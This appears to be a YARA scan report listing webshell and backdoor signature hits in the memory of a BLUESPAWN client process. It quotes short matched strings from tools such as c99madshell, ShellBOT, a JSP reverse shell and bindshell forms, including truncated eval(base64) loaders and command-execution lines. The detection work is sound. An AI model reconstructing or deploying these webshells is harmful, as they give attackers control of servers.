- 0x35ef68:$s0: http://michaeldaw.org 2006
- 0x35f63d:$s0: http://michaeldaw.org 2006
- 0x2f325d:$s1: or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
- 0x34ecbd:$s1: or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
- 0x2f32ad:$s3: coded by z0mbie
- 0x306d0e:$s3: coded by z0mbie
- 0x34ed03:$s3: coded by z0mbie
- 0x35d5c5:$s3: coded by z0mbie
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f341e:$s0: <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</opt
- 0x34ee20:$s0: <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</opt
- 0x2ddb48:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x2f3349:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x2f3479:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x306951:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x306ac5:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x340617:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x34ed78:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x34ee71:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x35d2ed:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x35d406:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x2f34b9:$s2: echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Nshell__1__php_php | Semi-Auto-generated - file Nshell (1).php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f35fd:$s0: echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($
- 0x34ef97:$s0: echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($
- 0x2f3658:$s1: if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f37b2:$sAuthor: ShAnKaR
- 0x30bbf2:$sAuthor: ShAnKaR
- 0x30bc4f:$sAuthor: ShAnKaR
- 0x34f0de:$sAuthor: ShAnKaR
- 0x361181:$sAuthor: ShAnKaR
- 0x3611c4:$sAuthor: ShAnKaR
- 0x2f37c6:$s0: <input type=checkbox name='dd' ".(isset($_POST['dd'])?'checked':'').">DB<input
- 0x34f0e8:$s0: <input type=checkbox name='dd' ".(isset($_POST['dd'])?'checked':'').">DB<input
- 0x2f3821:$s3: Show<input type=text size=5 value=".((isset($_POST['br_st']) && isset($_POST['b
- 0x34f139:$s3: Show<input type=text size=5 value=".((isset($_POST['br_st']) && isset($_POST['b
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Casus15_php_php | Semi-Auto-generated - file Casus15.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f3972:$s0: copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na
- 0x34f236:$s0: copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na
- 0x2f39cc:$s2: echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'
- 0x34f286:$s2: echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'
- 0x2f3a28:$s3: value='Calistirmak istediginiz
- 0x34f2d8:$s3: value='Calistirmak istediginiz
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | small_php_php | Semi-Auto-generated - file small.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e080b:$s1: $pass='abcdef1234567890abcdef1234567890';
- 0x2f3b45:$s1: $pass='abcdef1234567890abcdef1234567890';
- 0x2f3b7b:$s2: eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1
- 0x34f3cd:$s2: eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1
- 0x2e07e3:$s4: @ini_set('error_log',NULL);
- 0x2f3bd8:$s4: @ini_set('error_log',NULL);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shellbot_pl | Semi-Auto-generated - file shellbot.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f3ced:$s0: ShellBOT
- 0x34f4e1:$s0: ShellBOT
- 0x2f3d02:$s1: PacktsGr0up
- 0x34f4ec:$s1: PacktsGr0up
- 0x2f3d1a:$s2: CoRpOrAtIoN
- 0x34f4fa:$s2: CoRpOrAtIoN
- 0x2f3d32:$s3: # Servidor de irc que vai ser usado
- 0x34f508:$s3: # Servidor de irc que vai ser usado
- 0x2f3d63:$s4: /^ctcpflood\s+(\d+)\s+(\S+)
- 0x34f52f:$s4: /^ctcpflood\s+(\d+)\s+(\S+)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | fuckphpshell_php | Semi-Auto-generated - file fuckphpshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f3e82:$s0: $succ = "Warning!
- 0x34f5fa:$s0: $succ = "Warning!
- 0x2f3ea1:$s1: Don`t be stupid .. this is a priv3 server, so take extra care!
- 0x34f60f:$s1: Don`t be stupid .. this is a priv3 server, so take extra care!
- 0x2f3eec:$s2: \*=-- MEMBERS AREA --=*/
- 0x34f650:$s2: \*=-- MEMBERS AREA --=*/
- 0x2f3f11:$s3: preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['o
- 0x34f66b:$s3: preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['o
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ngh_php_php | Semi-Auto-generated - file ngh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4049:$s0: Cr4sh_aka_RKL
- 0x307596:$s0: Cr4sh_aka_RKL
- 0x34f74f:$s0: Cr4sh_aka_RKL
- 0x35dc78:$s0: Cr4sh_aka_RKL
- 0x2f4063:$s1: NGH edition
- 0x3075ab:$s1: NGH edition
- 0x34f75f:$s1: NGH edition
- 0x35dc8d:$s1: NGH edition
- 0x2f407b:$s2: /* connectback-backdoor on perl
- 0x34f76d:$s2: /* connectback-backdoor on perl
- 0x2f40a7:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x3075c9:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x34f78f:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x35dca1:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x2f40e8:$s4: $logo = "R0lGODlhMAAwAOYAAAAAAP////r
- 0x34f7c6:$s4: $logo = "R0lGODlhMAAwAOYAAAAAAP////r
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | jsp_reverse_jsp | Semi-Auto-generated - file jsp-reverse.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f420e:$s0: // backdoor.jsp
- 0x34f898:$s0: // backdoor.jsp
- 0x2f422a:$s1: JSP Backdoor Reverse Shell
- 0x34f8aa:$s1: JSP Backdoor Reverse Shell
- 0x2f3234:$s2: http://michaeldaw.org
- 0x2f4251:$s2: http://michaeldaw.org
- 0x2f736e:$s2: http://michaeldaw.org
- 0x308ea4:$s2: http://michaeldaw.org
- 0x308ed3:$s2: http://michaeldaw.org
- 0x3097e9:$s2: http://michaeldaw.org
- 0x309818:$s2: http://michaeldaw.org
- 0x34ec9e:$s2: http://michaeldaw.org
- 0x34f8c7:$s2: http://michaeldaw.org
- 0x351daa:$s2: http://michaeldaw.org
- 0x35ef43:$s2: http://michaeldaw.org
- 0x35ef68:$s2: http://michaeldaw.org
- 0x35f618:$s2: http://michaeldaw.org
- 0x35f63d:$s2: http://michaeldaw.org
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Tool_asp | Semi-Auto-generated - file Tool.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f435a:$s0: mailto:rhfactor@antisocial.com
- 0x34f97c:$s0: mailto:rhfactor@antisocial.com
- 0x2f4385:$s2: ?raiz=root
- 0x34f99d:$s2: ?raiz=root
- 0x2f439c:$s3: DIGO CORROMPIDO<BR>CORRUPT CODE
- 0x34f9aa:$s3: DIGO CORROMPIDO<BR>CORRUPT CODE
- 0x2f43c8:$s4: key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0
- 0x34f9cc:$s4: key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | NT_Addy_asp | Semi-Auto-generated - file NT Addy.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4511:$s0: NTDaddy v1.9 by obzerve of fux0r inc
- 0x34fac1:$s0: NTDaddy v1.9 by obzerve of fux0r inc
- 0x2f4542:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x309434:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x34fae8:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x35f36d:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x2f456f:$s4: RAW D.O.S. COMMAND INTERFACE
- 0x34fb0b:$s4: RAW D.O.S. COMMAND INTERFACE
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php | Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f46d3:$s0: SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend
- 0x34fc1b:$s0: SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend
- 0x2d5754:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x2f4710:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x34fc4e:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x2f476a:$s4: echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora
- 0x34fc9e:$s4: echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | RemExp_asp | Semi-Auto-generated - file RemExp.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f48b1:$s0: <title>Remote Explorer</title>
- 0x34fd91:$s0: <title>Remote Explorer</title>
- 0x2f48dc:$s3: FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFi
- 0x34fdb2:$s3: FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFi
- 0x2f4936:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3040ca:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x31904d:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x34fe02:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x35b3d0:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x36a8d0:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phvayvv_php_php | Semi-Auto-generated - file phvayvv.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4a83:$s0: {mkdir("$dizin/$duzenx2",777)
- 0x34fefb:$s0: {mkdir("$dizin/$duzenx2",777)
- 0x2f4aad:$s1: $baglan=fopen($duzkaydet,'w');
- 0x34ff1b:$s1: $baglan=fopen($duzkaydet,'w');
- 0x2f4ad8:$s2: PHVayv 1.0
- 0x34ff3c:$s2: PHVayv 1.0
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | klasvayv_asp | Semi-Auto-generated - file klasvayv.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4bde:$s1: set aktifklas=request.querystring("aktifklas")
- 0x34ffee:$s1: set aktifklas=request.querystring("aktifklas")
- 0x2f4c19:$s2: action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>
- 0x35001f:$s2: action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>
- 0x2f4c72:$s3: <font color="#858585">www.aventgrup.net
- 0x35006e:$s3: <font color="#858585">www.aventgrup.net
- 0x2f4ca6:$s4: style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT
- 0x350098:$s4: style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rst_sql_php_php | Semi-Auto-generated - file rst_sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4f90:$s0: C:\tmp\dump_
- 0x3502c6:$s0: C:\tmp\dump_
- 0x2f4fa9:$s1: RST MySQL
- 0x2fbea4:$s1: RST MySQL
- 0x3502d5:$s1: RST MySQL
- 0x3556c0:$s1: RST MySQL
- 0x2f4fbf:$s2: http://rst.void.ru
- 0x2fbec4:$s2: http://rst.void.ru
- 0x2fbee8:$s2: http://rst.void.ru
- 0x3502e1:$s2: http://rst.void.ru
- 0x3556e0:$s2: http://rst.void.ru
- 0x3556fa:$s2: http://rst.void.ru
- 0x2f4fde:$s3: $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
- 0x3502f6:$s3: $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | wh_bindshell_py | Semi-Auto-generated - file wh_bindshell.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f513b:$s0: #Use: python wh_bindshell.py [port] [password]
- 0x3503ff:$s0: #Use: python wh_bindshell.py [port] [password]
- 0x2f5176:$s2: python -c"import md5;x=md5.new('you_password');print x.hexdigest()"
- 0x2f51c6:$s3: #bugz: ctrl+c etc =script stoped=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | lurm_safemod_on_cgi | Semi-Auto-generated - file lurm_safemod_on.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f52f1:$s0: Network security team :: CGI Shell
- 0x2f5320:$s1: #########################<<KONEC>>#####################################
- 0x2f5374:$s2: ##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | c99madshell_v2_0_php_php | Semi-Auto-generated - file c99madshell_v2.0.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f54c3:$s2: eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef
- 0x3506b7:$s2: eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | backupsql_php_often_with_c99shell | Semi-Auto-generated - file backupsql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f5629:$s2: //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" .
- 0x3507c9:$s2: //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" .
- 0x2f567f:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x30a5b4:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x350815:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x36005d:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | uploader_php_php | Semi-Auto-generated - file uploader.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f57d2:$s2: move_uploaded_file($userfile, "entrika.php");
- 0x30885f:$s2: move_uploaded_file($userfile, "entrika.php");
- 0x2f580d:$s3: Send this file: <INPUT NAME="userfile" TYPE="file">
- 0x2f584d:$s4: <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | telnet_pl | Semi-Auto-generated - file telnet.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f597c:$s0: W A R N I N G: Private Server
- 0x2fcc64:$s0: W A R N I N G: Private Server
- 0x350a56:$s0: W A R N I N G: Private Server
- 0x356136:$s0: W A R N I N G: Private Server
- 0x2f59a6:$s2: $Message = q$<pre><font color="#669999"> _____ _____ _____ _____
- 0x350a76:$s2: $Message = q$<pre><font color="#669999"> _____ _____ _____ _____
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | w3d_php_php | Semi-Auto-generated - file w3d.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f5aee:$s0: W3D Shell
- 0x350b6a:$s0: W3D Shell
- 0x2f5b04:$s1: By: Warpboy
- 0x350b76:$s1: By: Warpboy
- 0x2f5b1c:$s2: No Query Executed
- 0x350b84:$s2: No Query Executed
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_cgi | Semi-Auto-generated - file WebShell.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f5b87:$s0: WebShell.cgi
- 0x2f5c29:$s0: WebShell.cgi
- 0x350bc8:$s0: WebShell.cgi
- 0x350c3d:$s0: WebShell.cgi
- 0x2f5c42:$s2: <td><code class="entry-[% if entry.all_rights %]mine[% else
- 0x350c4c:$s2: <td><code class="entry-[% if entry.all_rights %]mine[% else
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WinX_Shell_html | Semi-Auto-generated - file WinX Shell.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e033a:$s0: WinX Shell
- 0x2f5cda:$s0: WinX Shell
- 0x2f5d7f:$s0: WinX Shell
- 0x30ca60:$s0: WinX Shell
- 0x30cbcf:$s0: WinX Shell
- 0x342183:$s0: WinX Shell
- 0x350cbd:$s0: WinX Shell
- 0x350d35:$s0: WinX Shell
- 0x361c7e:$s0: WinX Shell
- 0x361d92:$s0: WinX Shell
- 0x2f5d96:$s1: Created by greenwood from n57
- 0x30cbf8:$s1: Created by greenwood from n57
- 0x350d42:$s1: Created by greenwood from n57
- 0x361db2:$s1: Created by greenwood from n57
- 0x2f5dc0:$s2: <td><font color=\"#990000\">Win Dir:</font></td>
- 0x350d62:$s2: <td><font color=\"#990000\">Win Dir:</font></td>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Dx_php_php | Semi-Auto-generated - file Dx.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2da53c:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f5ee8:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f9215:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x33e14f:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x350e36:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x3534f7:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f5f3f:$s2: $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util
- 0x350e83:$s2: $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util
- 0x2f5f9c:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP
- 0x350ed6:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | csh_php_php | Semi-Auto-generated - file csh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f60e2:$s0: .::[c0derz]::. web-shell
- 0x350fc8:$s0: .::[c0derz]::. web-shell
- 0x2f6107:$s1: http://c0derz.org.ua
- 0x350fe3:$s1: http://c0derz.org.ua
- 0x2f6128:$s2: vint21h@c0derz.org.ua
- 0x350ffa:$s2: vint21h@c0derz.org.ua
- 0x2f614a:$s3: $name='63a9f0ea7bb98050796b649e85481845';//root
- 0x351012:$s3: $name='63a9f0ea7bb98050796b649e85481845';//root
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | pHpINJ_php_php | Semi-Auto-generated - file pHpINJ.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6279:$s1: News Remote PHP Shell Injection
- 0x3510ed:$s1: News Remote PHP Shell Injection
- 0x2f62a5:$s3: Php Shell <br />
- 0x307331:$s3: Php Shell <br />
- 0x35daa6:$s3: Php Shell <br />
- 0x2f62c2:$s4: <input type = "text" name = "url" value = "
- 0x351122:$s4: <input type = "text" name = "url" value = "
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sig_2008_php_php | Semi-Auto-generated - file 2008.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f63ed:$s0: Codz by angel(4ngel)
- 0x3511f9:$s0: Codz by angel(4ngel)
- 0x2f640e:$s1: Web: http://www.4ngel.net
- 0x351210:$s1: Web: http://www.4ngel.net
- 0x2f6434:$s2: $admin['cookielife'] = 86400;
- 0x35122c:$s2: $admin['cookielife'] = 86400;
- 0x2f645e:$s3: $errmsg = 'The file you want Downloadable was nonexistent';
- 0x35124c:$s3: $errmsg = 'The file you want Downloadable was nonexistent';
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ak74shell_php_php | Semi-Auto-generated - file ak74shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f659f:$s1: $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION[
- 0x351339:$s1: $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION[
- 0x2f65f8:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x30a84c:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x351388:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x36026b:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x2f65c6:$s3: $xshell
- 0x2f6634:$s3: $xshell
- 0x351360:$s3: $xshell
- 0x3513ba:$s3: $xshell
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Rem_View_php_php | Semi-Auto-generated - file Rem View.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f673f:$s0: $php="/* line 1 */\n\n// ".mm("for example, uncomment next line")."
- 0x351471:$s0: $php="/* line 1 */\n\n// ".mm("for example, uncomment next line")."
- 0x2d5acc:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x2f678f:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33af2b:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x3514b7:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x2f67e8:$s4: Welcome to phpRemoteView (RemView)
- 0x351506:$s4: Welcome to phpRemoteView (RemView)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Java_Shell_js | Semi-Auto-generated - file Java Shell.js.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6908:$s2: PySystemState.initialize(System.getProperties(), null, argv);
- 0x2f6952:$s3: public class JythonShell extends JPanel implements Runnable {
- 0x2f699c:$s4: public static int DEFAULT_SCROLLBACK = 100
- 0x351652:$s4: public static int DEFAULT_SCROLLBACK = 100
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | STNC_php_php | Semi-Auto-generated - file STNC.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6ac2:$s0: drmist.ru
- 0x2f6ad8:$s1: hidden("action","download").hidden_pwd()."<center><table><tr><td width=80
- 0x351730:$s1: hidden("action","download").hidden_pwd()."<center><table><tr><td width=80
- 0x2f6b2e:$s2: STNC WebShell
- 0x30b096:$s2: STNC WebShell
- 0x35177c:$s2: STNC WebShell
- 0x3608ca:$s2: STNC WebShell
- 0x2f6b48:$s3: http://www.security-teams.net/index.php?showtopic=
- 0x35178c:$s3: http://www.security-teams.net/index.php?showtopic=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | aZRaiLPhp_v1_0_php | Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6c82:$s0: azrailphp
- 0x351872:$s0: azrailphp
- 0x2f6c98:$s1: <br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>
- 0x35187e:$s1: <br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>
- 0x2f6cee:$s3: <center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>
- 0x3518ca:$s3: <center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Moroccan_Spamers_Ma_EditioN_By_GhOsT_php | Semi-Auto-generated - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f6e62:$s0: ;$sd98="john.barker446@gmail.com"
- 0x3519ea:$s0: ;$sd98="john.barker446@gmail.com"
- 0x2f6e90:$s1: print "Sending mail to $to....... ";
- 0x309a72:$s1: print "Sending mail to $to....... ";
- 0x351a0e:$s1: print "Sending mail to $to....... ";
- 0x35f802:$s1: print "Sending mail to $to....... ";
- 0x2f6ec1:$s2: <td colspan="2" width="715" background="/simparts/images/cellpic1.gif" hei
- 0x351a35:$s2: <td colspan="2" width="715" background="/simparts/images/cellpic1.gif" hei
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | zacosmall_php | Semi-Auto-generated - file zacosmall.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f5fa5:$s0: rand(1,99999);$sj98
- 0x2f7009:$s0: rand(1,99999);$sj98
- 0x2f9f8e:$s0: rand(1,99999);$sj98
- 0x2fb6bd:$s0: rand(1,99999);$sj98
- 0x30db34:$s0: rand(1,99999);$sj98
- 0x350edf:$s0: rand(1,99999);$sj98
- 0x351b29:$s0: rand(1,99999);$sj98
- 0x353f30:$s0: rand(1,99999);$sj98
- 0x3550b9:$s0: rand(1,99999);$sj98
- 0x36292b:$s0: rand(1,99999);$sj98
- 0x2f7029:$s1: $dump_file.='`'.$rows2[0].'`
- 0x351b3f:$s1: $dump_file.='`'.$rows2[0].'`
- 0x2f7052:$s3: filename=\"dump_{$db_dump}_${table_d
- 0x351b5e:$s3: filename=\"dump_{$db_dump}_${table_d
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | CmdAsp_asp | Semi-Auto-generated - file CmdAsp.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f70ce:$s0: CmdAsp.asp
- 0x2f716e:$s0: CmdAsp.asp
- 0x309d59:$s0: CmdAsp.asp
- 0x309f12:$s0: CmdAsp.asp
- 0x309f2d:$s0: CmdAsp.asp
- 0x314ddb:$s0: CmdAsp.asp
- 0x351bb3:$s0: CmdAsp.asp
- 0x351c26:$s0: CmdAsp.asp
- 0x35fa23:$s0: CmdAsp.asp
- 0x35fb6d:$s0: CmdAsp.asp
- 0x35fb7f:$s0: CmdAsp.asp
- 0x367aa3:$s0: CmdAsp.asp
- 0x2d6416:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x2f7185:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x2f71d2:$s2: -- Use a poor man's pipe ... a temp file --
- 0x309e96:$s2: -- Use a poor man's pipe ... a temp file --
